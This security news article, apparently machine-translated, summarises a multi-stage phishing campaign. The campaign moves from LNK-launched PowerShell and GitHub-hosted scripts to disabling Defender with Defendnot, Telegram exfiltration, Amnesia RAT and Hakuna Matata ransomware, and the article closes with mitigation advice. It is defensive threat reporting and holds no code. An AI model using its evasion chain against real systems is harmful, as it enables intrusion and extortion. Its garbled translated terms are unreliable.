High-level Phishing: the multi-stage campaign that GitHub, Dropbox and Telegram uses to take control of Windows and cipher your files

In recent weeks, researchers have detected a sophisticated phishing campaign aimed at users in Russia that combines social deception with various stages of payload to obtain total control of equipment and, in many cases, encryption files. The operation uses apparently administrative documents, access to public cloud services and techniques that seek to disable the native Windows defenses, which makes it a clear example of how attackers chain legitimate tools and services to evade blockages. For technical analysis and specific examples, see the Fortinet FortiGuard Labs report documenting the flow of the infection: Inside a multi-stage Windows malware campaign.

The attack begins with a classic but effective hook: a compressed file containing documents of harmless appearance and a direct access to Windows (LNK) with a Russian name designed to look like a .txt. That shortcut hides a PowerShell order that downloads a script from a public repository in GitHub. The strategy of using services such as GitHub for scripts and Dropbox for binaries makes the infrastructure resistant to rapid removal because separating functions between public platforms complicates the response by suppliers and security equipment.

The first script that runs acts as a light charger: it hides the PowerShell window so that the user does not perceive activity, leaves a visible "bait" copy to maintain the illusion and, in the meantime, notifies the operator through the Telegram Bot API. This notification is a sign that the initial phase passed without errors and that the attacker can continue with the later stages. The technique of showing a legitimate document to the victim while silently performing malicious actions from behind is a social tactic that reduces the likelihood that the victim will stop the attack.

After a deliberate delay, the charger recovers and runs a strongly obfuscated Visual Basic file that builds the next payload directly in memory. By mounting the code in memory they avoid leaving artifacts on disk and frustrate many traditional detection tools. If the load does not have high privileges, the code annoys the user with account control tables until it is raised; once with administrative permits, it proceeds to disable and armored the environment to prevent detection and recovery.

The measures that malware applies are varied and worrying: it modifies exclusions and settings of Microsoft Defender, disables additional protection components using PowerShell, uses a utility called Defendnot to record a false security product at the Windows Security Center and thus cause Defend to deactivate, and alter policies in the register to disable administrative and diagnostic tools. Microsoft advises to activate the protection against manipulation and monitor unusual changes in the service to mitigate the abuse of this API; its technical recommendations are available in the Microsoft knowledge base: Microsoft Defender vs Defendnot.

In addition to neutralizing defenses, the actor downloads additional modules that collect information and filter it. A .NET module takes regular screenshots and sends them via Telegram, other components extract credentials stored in browsers, cryptomoneda coins and applications such as Discord, Steam or Telegram, and can also record microphone audio, webcam images and clipboard content. One of the final artifacts is a remote-access Trojan known as Amnesia RAT, recovered from Dropbox, which provides total remote control: process listing and completion, command execution, additional payloads deployment and data exfiltration via HTTPS or through external accommodation services. Fortinet describes these capabilities in detail in its technical analysis: see Fortinet report.

The threat is not limited to espionage: after leaving the inert system in front of defence tools, the attackers deploy a variant of ransomware derived from the Hakuna Matata family that numbers documents, source code, images and other assets. Before encryption, the processes that could interfere with its operation are completed and, silently, the ansomware monitors the clipboard to replace cryptomoneer addresses with others controlled by the attackers. The final result on many machines is loss of access to critical information and, in some cases, an additional blocking of the user interface through a WinLocker component.

In parallel, the response teams have observed related campaigns using different techniques and tools but with similar objectives. For example, the operation called DupeHike, attributed to the UNG0902 actor and documented by Seqrit Labs, uses decals on payroll and internal policies to induce the execution of an implant called DUPERUNNER which, in turn, downloads the AdaptixC2 frame. There have also been campaigns by an actor known as Paper Werewolf or GOFFIE who used artificial intelligence-generated lures and Excel XLL supplements to deliver the EchoGather backdoor; Intezer explained that chain and the use of WinHTTP in communication with C2: Intezer analysis.

What can organizations and users do about this kind of campaign? There is no single solution, but there are several practices that reduce risk. The first line of defence is to prevent the automatic execution of code from documents and direct access by mail, and set policies that limit the use of PowerShell and scripts in workstations that do not require it. It is important to activate integrity mechanisms in antivirus, such as the handling protection offered by modern solutions, and apply application controls that prevent binary execution from time or user locations. Network segmentation and the segregation of privileged accounts, along with offline backup of critical data, reduce the impact if massive encryption occurs. Microsoft and other suppliers issue specific guides to mitigate platform abuses and operational recommendations, and security teams should review these resources and alerts regularly.

If an organization suspects that it has been compromised by this family of threats, immediate actions should include the isolation of affected hosts to cut the exfiltration, the collection of hot evidence carefully to avoid destroying traces, the rotation of credentials and the notification to the relevant regulatory and banking entities if financial data have been at risk. A tested response plan and collaboration with security service providers can accelerate recovery. To understand the specific abuse of Defendnot and how to detect it, teams can refer to Binary Defense analysis and response materials published by EDR and SOCs providers: Defendnot: turning Windows Defender against itself.

The technical and operational lesson of these incidents is clear: modern attackers achieve total commitments without exploiting software failures, taking advantage instead of the abuse of legitimate system functionalities and cloud services. This requires the combination of technology with processes and training; the user who receives a ZIP with an LNK should not open it by default, and administrators should monitor changes in security policies and telemetry indicators that announce unauthorized PowerShell execution, connections to unusual public repositories or traffic to messaging services and file hosting from stations that never use them. Visibility, prevention and a response plan are the best defense against these complex attack chains.